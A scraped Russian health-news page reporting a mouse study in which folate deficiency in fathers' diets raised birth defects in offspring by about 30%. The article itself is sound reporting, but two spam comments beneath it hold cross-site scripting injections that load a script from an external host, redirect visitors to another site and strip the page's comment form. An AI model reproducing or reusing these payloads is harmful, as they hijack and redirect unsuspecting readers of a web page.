Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  То, что ест отец до зачат...  >>  То, что ест отец до зачатия, влияет на здоровье ребенка
 
Обратная связь
 

То, что ест отец до зачатия, влияет на здоровье ребенка

Размер шрифта
06 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Народная молва совершенно незаслуженно перекладывает на мам всю ответственность за здоровье будущего малыша. Однако ученые считают, что диета отца также имеет важное значение.

То, что ест отец до зачатия, влияет на здоровье ребенка

Особое внимание авторы уделили витамину B9 (фолиевая кислота). Это вещество входит в состав зелени, многих круп, фруктов и мяса. Давно известно, что этот витамин необходим для профилактики выкидышей и пороков развития нервной системы у плода. Женщины до и во время беременности должны получать достаточное количество этого важнейшего соединения, чтобы избежать этих проблем.

Однако, до сегодняшнего дня значимость отцовского рациона полностью выпадала из поля зрения научного мира. Коллектив ученых во главе с доктором Сарой Кимминс решил восполнить этот пробел. Им удалось выяснить, что содержание фолиевой кислоты в диете отца играет сопоставимо значимую роль для нормального развития плода. Вывод, очевидно вытекающий из этого наблюдения: мужчины должны столь же ответственно относиться к своему питанию и образу жизни перед зачатием.

«Несмотря на то, что фолиевую кислоту сейчас добавляют в огромное количество продуктов питания, дефицит этого витамина в рационе вполне реален, учитывая пугающую популярность фаст фуда и другой пищи, не обогащенной этим веществом», – говорит доктор Кимминс. «В группе наибольшего риска находятся люди, населяющие территории с ограниченным доступом к пищевым ресурсам».

Ученые проводили серию экспериментов на мышах. Животные были разделены на две группы: в одной из них самцов кормили сбалансированным кормом, в другой – кормом, обедненным витамином B9. Оказалось, что в последнем случае у потомства намного чаще отмечались различные пороки развития.

«Мы были весьма удивлены, обнаружив, что дефицит фолиевой кислоты в корме самцов на 30% повышает риск развития внутриутробных дефектов», – рассказывает доктор Ромэн Ламбро, научный сотрудник исследовательской группы. «В частности, мы наблюдали большое количество аномалий развития скелета – в первую очередь костей черепа и позвоночного столба».

Авторы показали, что в генетическом материале сперматозоидов имеются участки, особенно чувствительные к внешним факторам (в особенности – диетическим). Таким образом, дефицит фолиевой кислоты может повреждать ДНК отцовских половых клеток, а повреждения эти напрямую передаются потомству.

«Результаты нашей работы указывают на то, что мужчинам стоит задумываться о том, что они едят, пьют и чем дышат. Помните: на вас лежит прямая ответственность за здоровье грядущих поколений», – утверждает доктор Кимминс. «В будущем мы планируем тесно сотрудничать с репродуктивными клиниками, чтобы в деталях проработать эту концепцию и выявить другие потенциальные факторы риска со стороны отца».

О том, как сохранить здоровье еще не рожденного маленького человека, читайте на страницах нашего специального проекта «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всего лишь одно изменение в жизни поможет избежать выкидыша!   Синдром Дауна может быть излечим! Новости из США!   Кошмар! Сок нельзя пить, если хочешь быть красивой и стройной!   Вакцина, которую должен сделать каждый!  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Можно ли подгадать с беременностью?
Первые шаги вашего малыша
Какой бутылкой кормить ребенка?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.